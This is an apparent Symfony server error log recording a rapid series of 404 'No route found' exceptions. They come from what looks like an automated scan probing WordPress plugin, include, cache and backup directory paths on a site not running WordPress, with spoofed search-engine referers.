[2025-12-15 23:43:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/plugins/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/plugins/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:43:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/plugins/HelloDollyV2/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/plugins/HelloDollyV2/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/themes/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/themes/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/upgrade/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/upgrade/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/ID3/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/ID3/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/PHPMailer/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/PHPMailer/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Requests/" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Requests/\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Requests/Auth/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Requests/Auth/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/SimplePie/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/SimplePie/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/SimplePie/Content/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/SimplePie/Content/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Renderer/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Renderer/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/assets/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/assets/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-patterns/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-patterns/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/certificates/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/certificates/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/css/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/css/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/customize/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/customize/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/cache/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/cache/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/w3tc/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/w3tc/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/et-cache/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/et-cache/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/cache/supercache/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/cache/supercache/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/wflogs/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/wflogs/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/updraft/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/updraft/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/ai1wm-backups/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/ai1wm-backups/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite/" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite/\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backup-db/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backup-db/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/woocommerce_uploads/" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/woocommerce_uploads/\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/woocommerce/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/woocommerce/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/wc-logs/" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/wc-logs/\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-15 23:44:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/fonts/" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/fonts/\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
